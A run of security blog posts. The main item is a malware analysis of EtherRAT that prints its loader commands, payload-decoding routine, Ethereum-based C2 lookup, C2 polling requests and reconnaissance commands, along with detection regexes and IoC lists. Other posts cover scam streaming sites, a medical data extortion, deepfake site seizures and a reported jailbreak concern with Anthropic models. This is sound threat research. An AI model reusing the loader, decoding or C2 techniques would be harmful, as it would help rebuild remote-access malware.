The real threat is the ad network. This isn’t mainstream, vetted advertising. The kind of ad network we flag as malicious is a common delivery route for the stuff that causes harm: fake virus warnings, bogus software update prompts that install malware, fake prize and verification pages, and forced redirects into subscription traps.

The video window itself is untrusted. The stream is pulled from a third-party piracy service, not anything the site controls or vets. Pirated stream embeds are a well-known source of their own ads, redirects, and hidden clickable overlays, so even the part that looks like a video player can be working against you.

There’s nobody behind the counter. These are anonymous, disposable sites built around a major sporting event. There’s no real company, no support, no accountability, and no reason for them to care what lands on your screen.

It’s the oldest play in the scam handbook: take something millions of people want right now, present it nicely, and monetize the rush. Scammers don’t create the demand, they just stand in front of it with a bucket and collect payment.

How it works (a quick technical version)

The first tap is hijacked. A script waits for your first click or tap anywhere on the page and uses it to open an ad in a new tab or window, often in the background. Before you’ve watched a second of football, you’ve already triggered an ad.

The “Play” button is a maze. Clicking Play doesn’t play anything. Instead, you’re sent through prompts like “Click Resume to continue” before you might reach a video. Every extra step is another click, and each click triggers more ads.

Invisible ads load. The page quietly loads tiny, invisible 1×1-pixel ads and opens more tabs. These exist purely to generate paid ad views. The tactic has many of the hallmarks of ad fraud, and you’re the unwitting traffic. More ads are injected into the player area the moment you try to watch.

The stream is an afterthought. Often there’s no working stream at all, so the page loops you through “Streams loading… Retry,” which means more clicks and more ads. Whether you ever see the match or not, the ads have already cashed in.

What the ads are serving up

The code fires the ads, but here’s what comes out the other end. On these pages, the injected ads tend to fall into two buckets, and neither has anything to do with football.

The first is fake message notifications: little pop-ups designed to look like real chat alerts, complete with a stranger’s photo and messages such as “Seen my message yet? Let’s talk!” Some include fake voice messages or explicit thumbnails. They’re made to look like notifications you’ve forgotten to check so you’ll click them.

The second is crypto bait. These ads promote “play-to-earn” games with promises of daily rewards, surprise drops, massive airdrops, and eye-catching claims like a “124% APY yield engine.”

One warning sign is the promise of guaranteed triple-digit returns and free money for tapping a button. That’s not how legitimate financial products work.

That’s the whole machine working end to end: football is the doorway, the malicious advertising network is the engine, and the scams are what it’s actually selling.

How to watch the World Cup safely

These “Free HD stream, every match, no catch” sites use football as bait to funnel visitors through a malicious advertising network. Here’s how to stay safe:

  • Use official broadcasters and streaming services. That’s where the legal and safe coverage lives.
  • Treat “every match, free, HD, no signup” as a red flag. Broadcast rights are expensive. If a random website is giving everything away for free, it’s making money some other way.
  • Don’t follow a maze of interactions. If a streaming site opens pop-ups, launches extra tabs, or sends you through endless “click to continue” screens, close it.
  • Never trust warnings or download prompts on these sites. Don’t download anything, install anything, or enter any information.
  • Block ads and trackers in the browser. A tool like Malwarebytes Browser Guard can block the advertising and tracking domains these sites rely on, helping stop pop-ups and redirects before they load.
  • Keep your software up to date. Browser and operating system updates often fix security vulnerabilities that attackers try to exploit.
  • Use up-to-date, real-time anti-malware. If you do click something malicious, products like Malwarebytes Premium can block and remove malware before it causes damage.

Indicators of compromise (IoCs)

Domains

Stop threats before they can do any harm.

Malwarebytes Browser Guard blocks phishing pages and malicious sites automatically. Free, one click to install. Add it to your browser →

Cardiac patients’ medical data stolen and held to ransom

Malware Bytes Security - Tue, 06/16/2026 - 8:49am

Cardiac monitoring provider iRhythm has been hit by a data theft followed by an extortion attempt.

In a filing with the Securities and Exchange Commission (SEC), iRhythm revealed it was contacted by someone on June 9 who claimed to have stolen sensitive information, including proprietary data, patient PHI, and other personal information. That person demanded payment in exchange for not publishing the data.

iRhythm provides ambulatory cardiac monitoring and analysis (for example using the Zio patch) and has reportedly processed over two billion hours of heartbeat data from more than twelve million patients.

In the filing, the company said the data was obtained through social engineering and is from “certain third-party-hosted business applications”, without revealing any further details about the amount of data.

On its own website, iRhythm also doesn’t disclose much about the nature of the stolen data, but does seem to imply no financial data was affected:

“We have not identified any impact to our products, our clinical or medical device systems, our connections to customers, our manufacturing and distribution operations, patient safety, or our ability to meet patient needs. In addition, we do not store or retain individual financial account information or payment card information.

As we actively investigate, we will notify individuals affected by this incident in accordance with applicable law and take steps as needed to protect and remediate the impact to them.”

However, the SEC filing adds that iRhythm determined that the incident is significant, “in light of the volume of the potentially affected data.” Together with the extortionist’s claims that they have patients’ medical data, that makes the breach one worth noting if you have used iRhythm’s services.

Even without payment data, healthcare breaches have serious downstream effects:

  • Attackers can craft highly convincing emails, texts, or calls that reference specific procedures or monitoring episodes (for example, “about your recent Zio patch recording”) to trick patients into sharing more data or paying fake bills.
  • The breached data can be used to create a fake identity, commit insurance fraud, or carry out medical identity theft.
  • Exposure of cardiac and other health‑related information can be deeply sensitive and may have employment/insurance ramifications, especially if data is posted publicly or sold to data brokers.

Healthcare breach data tends to circulate for years, and victims may face sporadic fraud and phishing attempts long after the headlines fade.

How to stay safe

If you’ve used iRhythm’s services, keep an eye on your post, email, and patient portals for official breach notifications from iRhythm or your healthcare provider.

In the US, breaches of protected health information that meet certain criteria must be reported to patients and regulators. iRhythm has promised to “notify individuals affected by this incident in accordance with applicable law and take steps as needed to protect and remediate the impact to them.”

To stay out of the hands of phishers and scammers:

  • When you receive a communication about the data breach, verify through other channels that it really came from iRhythm. Go directly to iRhythm’s official website or patient portal, or call a known phone number to confirm the communication is genuine.
  • Be extra suspicious of emails or texts that claim to offer compensation, refunds, or other financial consequences related to this incident.
  • Change passwords for your iRhythm‑linked portals and your cardiology or hospital patient portals, especially if you reused those passwords elsewhere.
  • Log into your health insurer’s portal and check claims on a regular basis.
  • If you see anything suspicious, report it immediately to your insurer and provider and ask them to flag your account for possible identity theft.
  • Do not provide personal or financial information over the phone just because the caller knows details about you; they may have obtained those details from the stolen data.

Let’s face it, an incognito window can only do so much. 
 
Breaches, dark web trading, credit fraud. Malwarebytes Identity Theft Protection monitors for all of it, alerts you fast, and comes with identity theft insurance. 

Deepfake posting sites depicting famous women taken down by feds

Malware Bytes Security - Tue, 06/16/2026 - 6:31am

Thanks to Uncle Sam, anyone trying to find nonconsensual intimate deepfakes on CFake.com and SOCFake.com will be disappointed. The US Departments of Justice (DOJ) and Homeland Security have seized the two domain names under the TAKE IT DOWN Act.

The TAKE IT DOWN Act, signed in May 2025, is the first US federal statute criminalizing the publication of nonconsensual intimate imagery, including AI-generated forgeries. It imposes penalties of up to two years’ imprisonment, gives covered platforms 48 hours to remove flagged content, and grants the forfeiture powers the DOJ just used.

According to the seizure warrants, the digital forgeries depicted “politicians, first ladies of multiple countries, royalty, journalists, television presenters, athletes, entertainers, and others,” and visitors could browse them under tags including “rape,” “forced,” and “degradation”.

The authorities didn’t just snag the sites, though. They got the alleged operator of CFake.com, in an international effort.

The US alerted the Paris prosecutor’s office to a French national in Nice who was allegedly running CFake.com. French investigators counted roughly 300,000 images and 7,000 videos depicting 14,000 people across CFake.com, drawing four million monthly views from 200,000 user accounts.

They then arrested the IT professional, who had no prior criminal record. They also found around $64,000 in Ether cryptocurrency at his home, advertising revenue from the site.

The man will be tried on July 7 in Paris for carrying out illicit transactions online and providing nonconsensual sexual deepfakes. The former offence carries a potential seven years’ imprisonment and a €500,000 (approximately $580,000) fine. The latter could yield three years and a €75,000 ($87,000) fine.

Providers and accused providers of nonconsensual intimate deepfakes have also been held in the US. In April, James Strahler II from Ohio pleaded guilty to cyberstalking, producing child sexual abuse material, and publishing digital forgeries.

Strahler had downloaded and produced over 700 images and animations posted to a child sexual abuse site, and had sent deepfake material to at least six adult women, including one sent to a victim’s coworkers.

Last month, the DOJ also arrested Cornelius Shannon and Arturo Hernandez under the TAKE IT DOWN Act for publishing thousands of deepfake images of prominent women and those not in the public eye.

Other countries are also taking action. Anthony Rontondo was arrested by Australian authorities in May last year for posting deepfaked pictures of prominent Australian women. He eventually received an AU$343,000 fine.

How prevalent are deepfakes?

These seizures and prosecutions are encouraging, but prosecutors trying to force non-consensual deepfakes offline face a rising tide of such material. Requests for and sharing of nonconsensual deepfake imagery have risen, with activity migrating across platforms. Deepfake incidents overall jumped 257% in 2024, and girls accounted for 94% of victims in reported AI-generated child sexual abuse cases.

Seizing a distribution point removes a storefront. It does not remove the AI models used to produce the material, the anonymous hosting providers downstream, or the demand that draws visitors in the first place.

What you can do

If you or someone you know is depicted in a nonconsensual deepfake, keep dated screenshots, URLs, and any communications as evidence before filing a takedown request and reporting it to the authorities.

Limit the high-resolution face images you and your children post publicly, since school portraits and social media profile pictures are the raw material these tools need.

Take advantage of expert advice to help protect yourself from non-consensual deepfakes:

Inside a malicious infrastructure delivering EtherRAT, phishing pages, and malicious software 

Malware Bytes Security - Mon, 06/15/2026 - 4:17pm

During our recent threat hunting activities, we found EtherRAT malware being distributed by a website with a strange homepage. This homepage allowed us to discover a vast malicious infrastructure distributing malware, malicious documents, remote desktop software, and phishing pages. 

EtherRAT is a RAT developed in Node.js which allows an attacker to gain complete control over the machine and execute arbitrary code returned by the Command and Control (C2) server. The malware uses the Ethereum blockchain to obtain the C2 server, hence the “Ether” part of the name. EtherRAT is typically distributed via MSI, PowerShell, or JavaScript scripts.

An open directory that distributes EtherRAT: where it all began 

While threat hunting, we found an open directory that was distributing MSI installers and PowerShell scripts, which ultimately distributed EtherRAT. In the analyzed cases, the PowerShell scripts and MSI installers were distributed from a “/install” folder. The files are numbered progressively, from v1 to v10.

Open Directory hosting EtherRAT MSI 

The returned home page caught our attention and prompted us to further explore the campaign. 

The homepage returned by the EtherRAT distribution website 

Analyzing the domains and IPs associated with the EtherRAT distribution, we detected other similar home pages with a hacking-style theme. They appeared to belong to a larger distribution chain, which also distributes phishing, remote control software, and other malware. These websites usually have several folders with malware and phishing related content, and what is displayed depends on the specific infection chain.

Different websites that resolve to the same IP addresses have previously returned pages related to fake companies or default templates. The use of these new pages could therefore be a method to make detection more difficult for automated scanners or researchers. Here are some of the home pages we found:

Some of the malicious websites indexed on Google 

EtherRAT is an interesting RAT, as it has few lines of code and allows the execution of arbitrary code returned by the C2 server. Furthermore, using the Ethereum blockchain to obtain the C2 server makes it more resilient to infrastructure takedowns. 

Technical analysis of EtherRAT 

The detected websites usually distribute an MSI or PowerShell script with the version name, such as v1.msi, v2.ps1, and so on. 

MSI Loader 

The MSI file “v9.msi” contains three components: 

MSI contents:

  Filename              Description
  KmPuGimn.cmd          BAT launcher
  cDQMlQAru0.xml        First JScript loader
  MRaQCipBIZeiZNx.log   Encrypted EtherRAT

When the MSI is executed, the “KmPuGimn.cmd” file is started: 

conhost --headless cmd /c "KmPuGimn.cmd" 

This obfuscated BAT file performs different operations: 

  • Extracts the other files in a random folder in %LOCALAPPDATA%.
  • Re-executes itself via:
    • %SystemRoot%\System32\conhost.exe --headless %SystemRoot%\System32\cmd.exe /c call "C:\Users\{user}\AppData\Local\{random_path}\KmPuGimn.cmd" nKWa
  • Runs the command “where node” to find an existing installation.
  • Downloads Node.js if it’s not found:
    • Uses “curl -sLo” to download Node.js from the official website.
    • Extracts to the installation directory via “tar -xf”.
    • Renames the extracted directory to “28Q75h”.
  • Loops until both “MRaQCipBIZeiZNx.log” and “cDQMlQAru0.xml” exist, then executes:
    • conhost.exe --headless C:\Users\{user}\AppData\Local\{random_path}\{random_path}\node.exe cDQMlQAru0.xml

The executed “cDQMlQAru0.xml” is a loader that decrypts the embedded code with an XOR function and then executes it with “vm.compileFunction”.

    decrypted[i] = (encrypted[i] - key[i % key.length] - i) & 0xFF

The embedded decrypted code

The decrypted code: 

  • Copies node.exe to “C:\Users\{user}\AppData\Local\{random_path}\{random_path}\_MJlLlt5.exe”.
  • Adds a registry key for persistence with “conhost.exe --headless”.
  • Decrypts “MRaQCipBIZeiZNx.log” and executes it by passing it to “_MJlLlt5.exe” on stdin.

The decryption algorithm is a custom stream-like decoding routine based on XOR, byte rotations and an accumulator:

    def decode(data, n, si, k, prev=0):
        # n and k are the per-sample key tables and si is a 256-entry lookup table,
        # all recovered from the loader; the starting value of prev is taken from the
        # sample as well (0 assumed here).
        result = bytearray(len(data))
        for e in range(len(data)):
            byte = data[e]
            g = prev
            prev = byte
            byte = (byte - g) & 0xff                          # undo the running accumulator
            byte = byte ^ n[e % len(n)] ^ ((e >> 8) & 0xff)   # XOR with key stream and index
            byte = si[byte]                                   # table lookup
            byte = (byte - k[e % len(k)]) & 0xff              # subtract the second key
            result[e] = byte
        return bytes(result)

The final stage is to deploy EtherRAT. EtherRAT allows the attacker to: 

  • Execute arbitrary JavaScript code received from the C2 server. This allows the attacker to execute new commands, perform operations on files and folders, modify the registry, and exfiltrate data.
  • Get a new C2 server using the Ethereum blockchain. 
  • Reobfuscate itself. 
  • Save the logs to “svchost.log”. 

Part of decrypted EtherRAT code

EtherRAT uses Ethereum’s “eth_call” JSON-RPC method to retrieve the active C2 URL from a smart contract on the Ethereum mainnet.

The blockchain parameters in this case are: 

  • Contract: 0x88ea8d0bc4146f0a018e989df3fd089ac48f9a58 
  • Function selector: 0x7d434425 
  • Argument: 0xf6a772e163e64b07f658946f863b5d457d88f9f0 

The decoded C2 from Ethereum blockchain
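As an added example (not code from the write-up, and not the malware’s own code), this is how an analyst can reproduce the lookup offline: build the eth_call body from the contract, selector and argument listed above, then decode the value a gateway would return. It assumes the argument is a single address parameter and that the contract returns the URL as an ABI-encoded string; the reply below is constructed, with a placeholder URL.

```python
from typing import Dict

# Blockchain parameters reported in the analysis above.
CONTRACT = "0x88ea8d0bc4146f0a018e989df3fd089ac48f9a58"
SELECTOR = "0x7d434425"
ARGUMENT = "0xf6a772e163e64b07f658946f863b5d457d88f9f0"


def build_eth_call(contract: str, selector: str, address_arg: str) -> Dict:
    """Build the JSON-RPC eth_call body used to read the contract.

    Assumption: the argument is a single `address` parameter, so the calldata is
    the 4-byte selector followed by the address left-padded to a 32-byte word.
    """
    word = address_arg[2:].lower().rjust(64, "0")
    return {
        "jsonrpc": "2.0",
        "id": 1,
        "method": "eth_call",
        "params": [{"to": contract, "data": selector + word}, "latest"],
    }


def decode_abi_string(result_hex: str) -> str:
    """Decode an ABI-encoded `string` return value: offset word, length word, bytes."""
    raw = bytes.fromhex(result_hex[2:] if result_hex.startswith("0x") else result_hex)
    if len(raw) < 64:
        raise ValueError("result too short for an ABI string")
    offset = int.from_bytes(raw[0:32], "big")
    length = int.from_bytes(raw[offset:offset + 32], "big")
    start = offset + 32
    if start + length > len(raw):
        raise ValueError("declared string length exceeds result")
    return raw[start:start + length].decode("utf-8")


def encode_abi_string(value: str) -> str:
    """Inverse of decode_abi_string; used only to build the constructed sample reply."""
    data = value.encode("utf-8")
    padded = data + b"\x00" * (-len(data) % 32)
    return ("0x" + (32).to_bytes(32, "big").hex()
            + len(data).to_bytes(32, "big").hex() + padded.hex())


# Constructed sample reply (placeholder URL, not a real C2 observed in the campaign).
SAMPLE_REPLY = {"jsonrpc": "2.0", "id": 1,
                "result": encode_abi_string("https://c2.example.invalid/api")}


def extract_c2(reply: Dict) -> str:
    """Pull the C2 URL out of an eth_call JSON-RPC reply."""
    return decode_abi_string(reply["result"])
```

Sending the request body to any of the RPC gateways listed below is what the RAT does; for tracking purposes the decoded URL is the indicator to block.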

The contacted URLs to obtain the C2 server endpoint are: 

  • mainnet[.]gateway[.]tenderly[.]co 
  • rpc[.]flashbots[.]net/fast 
  • rpc[.]mevblocker[.]io 
  • eth-mainnet[.]public[.]blastapi[.]io 
  • ethereum-rpc[.]publicnode[.]com 
  • eth[.]drpc[.]org 
  • eth[.]merkle[.]io 

Polling requests use randomized URL patterns based on some parameters defined in the code: 

    GET /api/<4-byte-hex>/<victim-uuid>/<4-byte-hex>.<ext>?<param>=<build-id>
    X-Bot-Server: <c2_url>

In the analyzed sample, the parameters are: 

  • Build ID: “6f816d80-0d6c-4384-9cd6-6b79965fc08f” 
  • ext: randomly selected from “png”, “jpg”, “gif”, “css”, “ico”, “webp”. 
  • param: randomly selected from “id”, “token”, “key”, “b”, “q”, “s”, “v”. 

After startup, the RAT sends its own source code to the C2 server. The C2 responds with a newly obfuscated version of the script, which is written back to disk, making each execution generate a new file hash. 

    POST /api/[REOBF_PATH]/<victim-uuid>
    Body: { "code": "<current_script_contents>", "build": "<build_id>" }
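An added example (not code from the write-up) that turns the polling pattern, the re-obfuscation POST and the conhost/node.exe launcher described above into simple detection checks. The log format (request line followed by any headers of interest on the same line), the log lines and the command lines are constructed for illustration; the build ID is the one reported above.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

HEX4 = r"[0-9a-f]{8}"                                     # "4-byte-hex" segment
UUID = r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}"
EXTS = r"png|jpg|gif|css|ico|webp"                          # extensions listed above
PARAMS = r"id|token|key|b|q|s|v"                            # query parameter names listed above

# GET /api/<hex>/<victim-uuid>/<hex>.<ext>?<param>=<build-id>
POLL_RE = re.compile(
    rf"^GET /api/{HEX4}/(?P<uuid>{UUID})/{HEX4}\.(?:{EXTS})\?(?:{PARAMS})=(?P<build>{UUID})\b"
)
# POST /api/[REOBF_PATH]/<victim-uuid>; the path segment is not fixed, so any one segment matches.
REOBF_RE = re.compile(rf"^POST /api/[^/\s]+/(?P<uuid>{UUID})(?:\s|$)")
# Non-standard header carrying the C2 URL.
BOT_HEADER_RE = re.compile(r"\bX-Bot-Server:\s*(?P<c2>\S+)")

# Constructed sample log: request line, two spaces, then headers of interest.
SAMPLE_LOG = [
    "GET /api/3f9a1c2e/0b8f3c6e-2a41-4d2f-9c8e-5a7d1b3e4f60/9d2e4b7a.png?token="
    "6f816d80-0d6c-4384-9cd6-6b79965fc08f  X-Bot-Server: http://c2.example.invalid",
    "GET /static/logo.png",
    "POST /api/u7Kq2/0b8f3c6e-2a41-4d2f-9c8e-5a7d1b3e4f60  Content-Type: application/json",
    "GET /api/v1/users/42",
]


@dataclass
class Hit:
    line_no: int
    kind: str                   # "poll", "reobf" or "bot-header"
    victim_uuid: Optional[str]
    detail: Optional[str]       # build ID for polls, C2 URL for the header


def scan_request_log(lines: List[str]) -> List[Hit]:
    """Flag request lines that match the EtherRAT polling/re-obfuscation shapes."""
    hits: List[Hit] = []
    for no, line in enumerate(lines, start=1):
        m = POLL_RE.match(line)
        if m:
            hits.append(Hit(no, "poll", m["uuid"], m["build"]))
        m = BOT_HEADER_RE.search(line)
        if m:
            hits.append(Hit(no, "bot-header", None, m["c2"]))
        m = REOBF_RE.match(line)
        if m:
            hits.append(Hit(no, "reobf", m["uuid"], None))
    return hits


# conhost.exe --headless <path>\node.exe <script>
CMDLINE_RE = re.compile(
    r"conhost(?:\.exe)?\s+--headless\s+.*?node\.exe\s+(?P<script>\S+)", re.IGNORECASE
)


def is_suspicious_node_launch(cmdline: str) -> bool:
    """True when conhost --headless starts node.exe on a script without a JavaScript
    extension (the loader runs a .xml file) or from a copy under %LOCALAPPDATA%."""
    m = CMDLINE_RE.search(cmdline)
    if not m:
        return False
    script = m["script"].strip('"').lower()
    odd_extension = not script.endswith((".js", ".mjs", ".cjs"))
    in_localappdata = "\\appdata\\local\\" in cmdline.lower()
    return odd_extension or in_localappdata


# Constructed command lines: the first mirrors the launcher above, the others are benign.
SAMPLE_CMDLINES = [
    r"conhost.exe --headless C:\Users\alice\AppData\Local\xK9pQ\28Q75h\node.exe cDQMlQAru0.xml",
    r"conhost.exe --headless C:\Program Files\nodejs\node.exe server.js",
    r'"C:\Program Files\nodejs\node.exe" build.js',
]
```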

After the EtherRAT execution, we observed different post-compromise cmd.exe activity used to check the environment. For example:

  • powershell -NoProfile -NonInteractive -WindowStyle Hidden -Command "(Get-WmiObject Win32_VideoController).Name"
  • reg query "HKLM\SOFTWARE\Microsoft\Cryptography" /v MachineGuid
  • powershell -NoProfile -NonInteractive -WindowStyle Hidden -Command "(Get-WmiObject Win32_ComputerSystem).Domain"
  • powershell -NoProfile -NonInteractive -WindowStyle Hidden -Command "(Get-WmiObject Win32_ComputerSystem).PartOfDomain"
  • cmd.exe /d /s /c "net session"

EtherRAT logs

PowerShell Loader

The activities performed by the PowerShell loaders are very similar to the last stage of the JS script of the MSI installer: 

  • Downloads Node.js if it’s not present.
  • Creates the necessary directories.
  • Decodes EtherRAT with a custom decryption algorithm.
  • Executes Node.js with conhost.exe and the decrypted EtherRAT payload.

We detected several variants of the PowerShell loader hosted on these websites; the function names and the decryption routines differ between the analyzed scripts.

The decryption of the EtherRAT payload with the custom decryption algorithm

Tracking the malicious infrastructure

When we analyzed the different websites with the “hacking-theme” pages, we found that in the past many had hosted multiple phishing pages in some specific paths. For example: 

  • /zht/sharep-redirect.html 
  • /bl/me.php 
  • /t/teams 
  • /teams/Windows/invite.php 

It seems that these domains and IPs are actually part of a much larger infrastructure that distributes malware, phishing, malicious documents, and remote software. It is possible that these infrastructures are shared by multiple threat actors who activate different URL endpoints based on the specific campaign. 

Interestingly, the majority of the domains related to this malicious infrastructure in the past also returned an HTML page related to a “Bulletproof Infrastructure” service.  

We found that these phishing campaigns typically start via emails with documents attached, such as PDF or Excel files. These documents ask the user to click a link to view another document. Below are two examples of the phishing documents attached to the emails:

These phishing pages typically ask the user to enter their email address, then continue the infection chain and distribute phishing or malware pages.  Below are some of the phishing pages detected within the malicious infrastructure:

Misconfigurations exposed the phishing kits 

While tracking malicious websites, we found one with an open directory containing part of the phishing kit used in the campaigns. 

Open directory hosting part of phishing kits

 

The open directory contained several folders with code and pages related to the phishing campaigns. 

Phishing kit code 

Additionally, some domains were misconfigured and allowed the download of “cl.zip”, which contained the source code for the “URL Cloaker” pages. 

Part of the “URL Cloaker” code

Indicators of Compromise (IOCs)

IPs

  • 82[.]165[.]65[.]244: malicious infrastructure
  • 185[.]221[.]216[.]121: malicious infrastructure
  • 43[.]163[.]233[.]166: malicious infrastructure
  • 40[.]160[.]238[.]30: malicious infrastructure
  • 159[.]89[.]227[.]204: malicious infrastructure
  • 57[.]128[.]31[.]168: malicious infrastructure

Domains 

  • ivorilla[.]cloud: EtherRAT distribution
  • mx[.]nrlwz[.]com: EtherRAT distribution
  • dn[.]eyqwj[.]com: EtherRAT distribution
  • bi[.]mkrjcsw[.]com: EtherRAT distribution
  • dorqen[.]casa: EtherRAT distribution
  • kelvra[.]club: EtherRAT distribution
  • cambioefectivo[.]com: EtherRAT C2
  • vabelles[.]com: EtherRAT C2
  • tranzed[.]org: EtherRAT C2
  • kibrisarazi[.]com: EtherRAT C2
  • aravisblog[.]com: EtherRAT C2
  • publicspeakingtip[.]org: EtherRAT C2
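The practical use of the indicators above, and of the phishing-kit paths listed earlier under “Tracking the malicious infrastructure”, is to sweep existing logs for them. The script below is an added example written for this page (it is not Malwarebytes’ code): it refangs the published IPs and domains, then matches them, plus the four kit paths, against a handful of constructed proxy log lines. The log format (`timestamp client destination-ip url`) and the log content are assumptions made for the demo; the indicators themselves are copied from the lists above. Domain matching covers subdomains but deliberately rejects look-alike suffixes such as `vabelles.com.example.net`, and path matching will not let `/t/teams` fire on `/teams/...`.

```python
"""Sweep proxy log lines for the EtherRAT indicators published in this article.

Added example; not Malwarebytes' code. Indicators are the ones listed above,
the log lines and their format are constructed for the demo.
"""
from urllib.parse import urlparse

# Indicators exactly as published (defanged with "[.]").
IP_IOCS_DEFANGED = {
    "82[.]165[.]65[.]244": "malicious infrastructure",
    "185[.]221[.]216[.]121": "malicious infrastructure",
    "43[.]163[.]233[.]166": "malicious infrastructure",
    "40[.]160[.]238[.]30": "malicious infrastructure",
    "159[.]89[.]227[.]204": "malicious infrastructure",
    "57[.]128[.]31[.]168": "malicious infrastructure",
}
DOMAIN_IOCS_DEFANGED = {
    "ivorilla[.]cloud": "EtherRAT distribution",
    "mx[.]nrlwz[.]com": "EtherRAT distribution",
    "dn[.]eyqwj[.]com": "EtherRAT distribution",
    "bi[.]mkrjcsw[.]com": "EtherRAT distribution",
    "dorqen[.]casa": "EtherRAT distribution",
    "kelvra[.]club": "EtherRAT distribution",
    "cambioefectivo[.]com": "EtherRAT C2",
    "vabelles[.]com": "EtherRAT C2",
    "tranzed[.]org": "EtherRAT C2",
    "kibrisarazi[.]com": "EtherRAT C2",
    "aravisblog[.]com": "EtherRAT C2",
    "publicspeakingtip[.]org": "EtherRAT C2",
}
# Phishing-kit paths observed on the same infrastructure (from the article).
KIT_PATHS = [
    "/zht/sharep-redirect.html",
    "/bl/me.php",
    "/t/teams",
    "/teams/Windows/invite.php",
]


def refang(ioc: str) -> str:
    """Turn a defanged indicator ("evil[.]com", "1[.]2[.]3[.]4") into a matchable string."""
    return ioc.replace("[.]", ".").lower()


IP_IOCS = {refang(k): v for k, v in IP_IOCS_DEFANGED.items()}
DOMAIN_IOCS = {refang(k): v for k, v in DOMAIN_IOCS_DEFANGED.items()}


def host_matches(host: str, domain: str) -> bool:
    """True for the domain itself and its subdomains, never for look-alike suffixes."""
    host = host.lower().rstrip(".")
    return host == domain or host.endswith("." + domain)


def path_matches(path: str) -> bool:
    """Exact kit path or a file below it; "/t/teams" must not match "/teams/...". """
    return any(path == p or path.startswith(p + "/") for p in KIT_PATHS)


# Constructed proxy log (assumed format): "<timestamp> <client> <destination-ip> <url>".
SAMPLE_PROXY_LOG = """\
2026-06-01T10:00:01Z 10.0.0.5 203.0.113.10 https://example.org/index.html
2026-06-01T10:00:07Z 10.0.0.5 82.165.65.244 https://ivorilla.cloud/update/run.ps1
2026-06-01T10:01:12Z 10.0.0.9 203.0.113.22 http://shop.example/zht/sharep-redirect.html
2026-06-01T10:02:30Z 10.0.0.9 203.0.113.22 https://vabelles.com.example.net/
2026-06-01T10:03:44Z 10.0.0.7 198.51.100.4 https://www.kelvra.club/t/teams
"""


def scan_proxy_log(text: str) -> list[tuple[int, str, str]]:
    """Return (line_number, indicator, tag) for every indicator hit in the log."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        fields = line.split()
        if len(fields) != 4:
            continue  # skip malformed lines instead of crashing on them
        _ts, _client, dest_ip, url = fields
        if dest_ip in IP_IOCS:
            hits.append((n, dest_ip, IP_IOCS[dest_ip]))
        parsed = urlparse(url)
        host = parsed.hostname or ""
        for domain, tag in DOMAIN_IOCS.items():
            if host_matches(host, domain):
                hits.append((n, domain, tag))
        if path_matches(parsed.path):
            hits.append((n, parsed.path, "phishing kit path"))
    return hits


if __name__ == "__main__":
    for n, indicator, tag in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(f"line {n}: {indicator} ({tag})")
```

On the constructed log this flags lines 2, 3 and 5 (two hits on line 2: the destination IP and the distribution domain) and correctly ignores line 4, whose hostname merely starts with a listed domain.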

Acknowledgements 

Stop threats before they can do any harm.

Malwarebytes Browser Guard blocks phishing pages and malicious sites automatically. Free, one click to install. Add it to your browser →

Categories: Malware Bytes

Claude Fable 5 and Mythos 5 “abruptly disabled” after US gov. ban

Malware Bytes Security - Mon, 06/15/2026 - 10:32am

Anthropic has been ordered by the US government to cut off its newest Claude Fable 5 and Mythos 5 models for fear of abuse by adversaries.

Reuters reports that Anthropic said it will “abruptly disable” its most advanced AI models for all users after the US government ordered it to suspend access to the models for foreign nationals, citing national security concerns.

Officials reportedly believe a jailbreak could turn Fable 5 and Mythos 5 into vulnerability-discovery tools for adversaries, so Anthropic says it is disabling them worldwide rather than trying to filter access by nationality, since it is virtually impossible to verify every user’s nationality.

In a statement on its website, Anthropic says:

“The letter did not provide specific details of its national security concern. Our understanding is that the government believes it has become aware of a method of bypassing, or “jailbreaking” Fable 5. We reviewed a demonstration of this specific technique being used to identify a small number of previously known, minor vulnerabilities. These vulnerabilities all appear relatively simple, and we have found that other publicly-available models are able to discover them as well without requiring a bypass.”

Mythos 5 is the non-public full version, which is currently used only by government agencies and selected corporate partners to harden their systems. Fable 5 is a Mythos-class model that should supposedly be safe for general use.

It makes sense to me that if Fable 5 is easy to jailbreak, it should fall under the same restrictions as Mythos 5. However, Anthropic maintains that it has built-in safeguards that mean queries on some topics will instead receive a response from the next-most-capable model, Claude Opus 4.8.

Relations between Anthropic and parts of the US government had shown signs of easing after earlier tensions over military use, surveillance, and autonomous weapons. In March, Defense Secretary Pete Hegseth had designated the San Francisco-based company a “supply-chain risk to national security.”

To understand the nature of the argument, it is necessary to understand that Mythos 5 is described in multiple reports as particularly effective at identifying software vulnerabilities, including long‑standing bugs in complex, legacy systems such as those in banking and other critical infrastructure. Many view this as dual‑use: great for defense hardening, but catastrophic in the wrong hands.

In recent updates from major software vendors like Microsoft and Google, we’ve seen a growth in numbers of patched vulnerabilities after the vendors began using AI-guided search for new vulnerabilities in their own software. We also know that Mozilla found over 270 Firefox vulnerabilities with the aid of Anthropic’s new Claude Mythos model. 

What this means

In the wrong hands these vulnerabilities could definitely do a lot of harm. So, it looks like it will take some time before regular consumers and developers will gain access to Fable 5 and Mythos 5 entirely. However, existing Anthropic models (older Claude variants) remain available.

For home users who were simply chatting with Claude or using it to help with basic scripting, the change will mostly show up as “this specific version is unavailable” rather than a broader AI blackout.

Removing a high-end vulnerability-finding model from broad circulation raises the effort required for less-resourced cybercriminals to automate the discovery of complex bugs in consumer-facing software and services, but only to a point. There are other models available on the black market that might be just as effective. And for most cybercriminals, turning a vulnerability into a method they can utilize in an exploit is much more relevant.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Deepfake porn sites are going offline (re-air) (Lock and Code S07E12)

Malware Bytes Security - Mon, 06/15/2026 - 10:32am

This week on the Lock and Code podcast…

If you weren’t taking deepfakes seriously before, it’s too late now to ignore them.

According to new research from Malwarebytes, one in three people who use AI every day said it’s okay to generate pornography of people without their consent.

Nearly 10 years ago, “deepfake” technology provided hobbyists and film editors with artificial intelligence (AI) tools to swap the face of one person onto the body of another. In its infancy, this technology brought silly film experiments like swapping Tom Cruise in Mission Impossible with Keanu Reeves. Today, this same technology produces something far more harmful—fake nude images of teenagers.

On the Lock and Code podcast today with host David Ruiz, we are re-visiting an interview from 2024, in which we spoke with a lawyer named David Chiu about his lawsuit against 16 deepfake nude generation websites.

